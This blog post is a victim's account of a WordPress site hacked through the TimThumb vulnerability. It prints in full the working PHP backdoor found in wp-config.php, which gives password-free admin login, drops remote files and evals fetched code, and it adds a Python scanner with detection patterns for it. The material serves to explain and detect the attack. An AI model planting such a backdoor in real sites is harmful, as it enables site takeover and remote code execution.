Reported attack site

Unfortunately some douche decided to ruin my day by exploiting this site via the zero-day vulnerability found in timthumb.php that allows arbitrary file uploads. Yup, just like many self-hosting WordPress bloggers, one of my plugins or themes was using the vulnerable timthumb.php, and it ended up taking most of my day to — with the help of other victims — restore the site with a fresh and shiny clean install. I’ll have to admit that the site being compromised was due to laziness on my part. Even so, it’s not cool to mess things up for someone who doesn’t have a lot of time to keep everything in check. Bastards!

A few days ago I noticed that the anti-virus/malware programs kept making a fuss when I viewed this site on my Windows machines. I didn’t think much of it at the time. A couple of days later Google protested and flagged the site as a Reported Malware site. I also noticed the back-end acting a bit funky. Googling for answers gave me some clues. Luckily I stumbled upon Blake Embrey’s site, where I found out about the timthumb.php exploit. He also links to a really good tech site, blog.sucuri.net, which, like his, I advise you to follow.

Before anything else, if you suspect your site has been compromised, read Sucuri’s article Timthumb.php Security Vulnerability – Just the Tip of the Iceberg, then run their Sucuri WP_Check script to check for timthumb.php. You should also check out Bremley’s Warning: Something’s Not Right Here!, where he describes in detail the steps he took to remove the infection.

As for me, I just decided to start from scratch. First of all, I discovered this code in the wp-config.php file:


// Backdoor as found in wp-config.php (indented and commented for readability, behaviour unchanged).
// Anyone who knows the hard-coded hash can drive it with a plain GET request to any page.
if (isset($_GET['pingnow']) && isset($_GET['pass'])) {
    // Hard-coded "password": the visitor must supply this MD5 hash as ?pass=
    if ($_GET['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22') {
        // ?pingnow=login : logs the visitor in as 'admin' without a password
        if ($_GET['pingnow'] == 'login') {
            $user_login = 'admin';
            $user = get_userdatabylogin($user_login);
            $user_id = $user->ID;
            wp_set_current_user($user_id, $user_login);
            wp_set_auth_cookie($user_id);
            do_action('wp_login', $user_login);
        }
        // ?pingnow=exec&file=URL : downloads the URL into a new .php file in the
        // current directory; the name is md5(rand(0,100)) so only 101 names are possible
        if (($_GET['pingnow'] == 'exec') && (isset($_GET['file']))) {
            $ch = curl_init($_GET['file']);
            $fnm = md5(rand(0, 100)) . '.php';
            $fp = fopen($fnm, "w");
            curl_setopt($ch, CURLOPT_FILE, $fp);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_exec($ch);
            curl_close($ch);
            fclose($fp);
            echo "";
        }
        // ?pingnow=eval&file=URL : fetches the URL and executes its body as PHP in memory
        if (($_GET['pingnow'] == 'eval') && (isset($_GET['file']))) {
            $ch = curl_init($_GET['file']);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $re = curl_exec($ch);
            curl_close($ch);
            eval($re);
        }
    }
}

As soon as I saw “GET pass” I knew the site had been hacked. I’ll update this later on with the steps I took to have my site re-evaluated by Google so it would not be marked as malware. For now, read the links I provided, since they provide excellent removal information. Have you been a victim of this exploit as well? Leave your comments below.
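As an added example (my own, not the author’s code and not Sucuri’s WP_Check script), here is a small Python scanner that does the two checks this post talks about: it lists copies of TimThumb under a WordPress tree with the version they declare, and it flags PHP files that carry the traits of the wp-config.php backdoor shown above (hard-coded hash compared against $_GET, forged login via wp_set_auth_cookie, curl to a caller-supplied URL, eval of fetched content). It also uses a detail visible in that backdoor: PHP’s md5(rand(0,100)) hashes the decimal strings “0” to “100”, so any file the dropper creates has one of only 101 possible names, which the scanner searches for. The file names timthumb.php/thumb.php and the indicator regexes are my assumptions; the sample site is constructed in a temporary directory so the script runs offline.

```python
import hashlib
import os
import re
import shutil
import tempfile

# Assumed indicator set, derived from the backdoor quoted in the post; it is a
# starting point for a manual review, not a complete malware signature list.
INDICATORS = {
    "auth-bypass via GET parameter":
        re.compile(r"\$_GET\[['\"]pass['\"]\]\s*==\s*['\"][0-9a-f]{32}['\"]"),
    "forged login (wp_set_auth_cookie in a config file)":
        re.compile(r"wp_set_auth_cookie\s*\("),
    "eval of fetched content":
        re.compile(r"eval\s*\(\s*\$\w+\s*\)"),
    "dropper with md5(rand()) filename":
        re.compile(r"md5\s*\(\s*rand\s*\("),
    "curl to caller-supplied URL":
        re.compile(r"curl_init\s*\(\s*\$_(GET|POST|REQUEST)\["),
}

# Names under which TimThumb is commonly bundled in themes/plugins (assumption).
TIMTHUMB_NAMES = {"timthumb.php", "thumb.php"}
VERSION_RE = re.compile(r"define\s*\(\s*['\"]VERSION['\"]\s*,\s*['\"]([^'\"]+)['\"]")

# PHP's md5(rand(0,100)) hashes the strings "0".."100", so the dropper in the
# post can only ever write one of these 101 file names.
DROPPER_NAMES = {hashlib.md5(str(n).encode()).hexdigest() + ".php" for n in range(101)}


def php_files(root):
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(".php"):
                yield os.path.join(dirpath, name)


def scan_file(path):
    """Return the names of the indicators that match this file's contents."""
    with open(path, "r", encoding="utf-8", errors="ignore") as fh:
        text = fh.read()
    return [label for label, rx in INDICATORS.items() if rx.search(text)]


def find_timthumb(root):
    """Return (path, declared version or None) for every TimThumb copy found."""
    hits = []
    for path in php_files(root):
        if os.path.basename(path).lower() in TIMTHUMB_NAMES:
            with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                m = VERSION_RE.search(fh.read())
            hits.append((path, m.group(1) if m else None))
    return hits


def find_dropped_files(root):
    """Return PHP files whose name matches one of the 101 possible dropper names."""
    return [p for p in php_files(root) if os.path.basename(p) in DROPPER_NAMES]


# Constructed sample site: a backdoored wp-config.php, a theme bundling an old
# TimThumb, one file the dropper could have written, and a clean index.php.
PLANTED_DROPPER = hashlib.md5(b"1").hexdigest() + ".php"

BACKDOOR_SNIPPET = r"""<?php
if (isset($_GET['pingnow']) && isset($_GET['pass'])) {
    if ($_GET['pass'] == 'd41d8cd98f00b204e9800998ecf8427e') {
        if ($_GET['pingnow'] == 'login') { wp_set_auth_cookie($user_id); }
        if ($_GET['pingnow'] == 'exec') {
            $ch = curl_init($_GET['file']); $fnm = md5(rand(0,100)).'.php';
        }
        if ($_GET['pingnow'] == 'eval') { $re = curl_exec($ch); eval($re); }
    }
}
"""


def build_sample_site():
    root = tempfile.mkdtemp(prefix="wp-sample-")
    theme = os.path.join(root, "wp-content", "themes", "sometheme")
    os.makedirs(theme)
    with open(os.path.join(root, "wp-config.php"), "w") as fh:
        fh.write(BACKDOOR_SNIPPET)
    with open(os.path.join(theme, "timthumb.php"), "w") as fh:
        fh.write("<?php\ndefine ('VERSION', '1.19');\n")   # constructed version value
    with open(os.path.join(root, PLANTED_DROPPER), "w") as fh:
        fh.write("<?php /* whatever the dropper fetched */\n")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php define('WP_USE_THEMES', true); require('./wp-blog-header.php');\n")
    return root


def run_demo():
    """Build the sample site, run the three checks, and return the findings."""
    root = build_sample_site()
    try:
        return {
            "backdoor_hits": scan_file(os.path.join(root, "wp-config.php")),
            "clean_hits": scan_file(os.path.join(root, "index.php")),
            "timthumb_versions": [v for _, v in find_timthumb(root)],
            "dropped": [os.path.basename(p) for p in find_dropped_files(root)],
        }
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

On a real install, point `php_files` at the WordPress root and treat every hit as something to read by hand: the regexes are deliberately broad, and the dropper-name check only catches files written by this particular backdoor with the current directory set to the web root.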
